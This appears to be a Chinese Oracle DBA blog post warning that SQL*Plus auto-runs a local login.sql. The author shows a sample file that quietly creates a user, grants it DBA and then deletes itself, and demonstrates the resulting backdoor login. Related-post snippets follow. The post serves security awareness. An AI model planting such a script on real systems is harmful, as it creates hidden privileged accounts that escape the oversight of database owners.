[20140221]login.sql与系统安全.txt

[20140221]login.sql与系统安全.txt

--昨天帮别人解决问题,因为显示的问题我需要调整linesize的设置.我发现我的改动不生效.
--仔细检查才发现在本地目录有一个login.sql.

--因为机器是别人的,我突然想到login.sql引起的安全问题.
--如果我在login.sql包含如下内容结果如下呢?

set feedback off
set termout off
create user test1 identified by test1;
grant dba to test1;
set feedback on
host rm ~/login.sql

--以一个dba用户登录:

SCOTT@test> select username from dba_users where username='TEST1';
USERNAME
------------------------------
TEST1

1 row selected.

--退出.

$ ll login.sql
ls: login.sql: No such file or directory

$ sqlplus test1/test1
SQL*Plus: Release 11.2.0.3.0 Production on Fri Feb 21 10:12:51 2014
Copyright (c) 1982, 2011, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

--看来在提供的机器使用要注意这些细节问题.特别是使用别人的机器访问自己的服务器.

时间: 2024-09-27 18:15:20

[20140221]login.sql与系统安全.txt的相关文章

glogin.sql 和 login.sql

glogin.sql :   无论何时sql*plus 开始的时候,总是先找到/%oracle_home%/sqlplus/admin目录下的glogin.sql 文件,如果这个文件找到了,就开始读取并继续执行,这个文件中存储了一些设置文件,如linesize.   读完glogin.sql这个文件之后,oracle还会查找login.sql这个文件,这是10G以及以上版本新添加的,9i中不存在,这个文件通常被放置在SQL*PLUS 和 环境变量SQLPATH 指向的目录,然后读并执行它: or

[20150715]一条sql语句的优化.txt

[20150715]一条sql语句的优化.txt --生产系统发现一条语句. update presc_check t set t.diagnosis=replace(t.diagnosis,',慢性病drugs','') --第1眼看到的感觉真的很想骂人,什么能没有where条件呢? --我把这个表拷贝过来.这个表占用1G多1点,在测试环境执行看看: -- copy from system/xxxx@ip:1521/tyt create presc_check using select * f

[20131122]跟踪sql profile的操作.txt

[20131122]跟踪sql profile的操作.txt sql profile是11G的新特性,前几天我在给别人做优化时,偷懒直接使用toad,step by step分析使用sql profile,导致系统执行缓慢,不得不中断分析.今天有空跟踪sql profile的操作看看,了解一些过程. SCOTT@test> @verBANNER-----------------------------------------------------------------------------

[20130319]一条sql语句的优化.txt

[20130319]一条sql语句的优化.txt 生产系统,遇到这样一条语句:SELECT MAX (LENGTH (pe_id)) FROM pe_master_index WHERE SUBSTR (pe_id, 1, 2) = 'TJ'; --真不知道开发人员如何想的,写出这样的语句.字段pe_id是主键.--数据库版本 SQL> select * from v$version where rownum BANNER                                     

[20131025]一条sql语句的优化.txt

[20131025]一条sql语句的优化.txt 最近在优化一条sql语句,做一个测试例子测试看看.遇到一些问题记录一下: 1.建立环境: SCOTT@test> @ver BANNER -------------------------------------------------------------------------------- Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Productio

黑客攻破SQL服务器系统的十种方法

无论是使用手工试探还是使用安全测试工具,恶意攻击者总是使用各种诡计从你的防火墙内部和外部攻破你的SQL服务器系统.既然黑客在做这样的事情.你也需要实施同样的攻击来检验你的系统的安全实力.这是理所当然的.下面是黑客访问和攻破运行SQL服务器的系统的十种诡计. 1.通过互联网直接连接 这些连接可以用来攻击没有防火墙保护.全世界都可以看到和访问的SQL服务器.DShield公司的端口报告显示了有多少系统在那里等待遭受攻击.我不理解允许从互联网直接访问这种重要的服务器的理由是什么.但是,我在我的评估中仍

glogin.sql和login.sql简介

使用sqlplus时,我们可以通过两个profile来设置sqlplus的默认行为:glogin.sql和login.sql. glogin.sql称为GLOBAL SITE PROFILE,位于$ORACLE_HOME/sqlplus /admin目录下,login.sql称为USER PROFILE,位于用户的当前路径,或者SQLPATH环境变量指定的路径下. 当用户启动sqlplus或者在sqlplus下执行conn命令时,sqlplus首先会调用glogin.sql文件,然后在当前路径下

如何解决win7系统打开txt文件提示“无法找到脚本文件”的方法

  我们使用win7系统的用户大家都会使用很多的办公软件,其中txt是一款非常常用的一款文本格式,使用起来也非常的方便,TXT大家主要是用来保存文本用的,可以直接打开就可以查看内容,也可以从浏览器中打开查看,但是有用户说自己在打开文件的时候出现了错误提示"无法找到脚本文件"的情况,要是大家的电脑出现了这样的情况该怎么办呢,小编马上就给大家分享解决方法. 出现TXT文件"无法找到脚本文件"的解决方法: 1.我们需要对自己的电脑进行深度的修复,跟着小编一起来更改一下软件

SQL Server系统数据库备份最佳实践

原文:SQL Server系统数据库备份最佳实践 首先了解主要的系统数据库: master 包含登录信息和其他数据库的核心信息 msdb 存储作业.操作员.警报.备份还原历史.数据库邮件信息等等. model 所有新数据库的模型,如果希望新数据库都有某些对象,可以在这里创建. tempdb sql server重启时重建,所以不需要备份 除了以上四种,其实还有一个数据库:Resource 从2005就引入的,一个只读.隐藏的数据库,包含所有在sql server中的系统对象.由于SQL SERV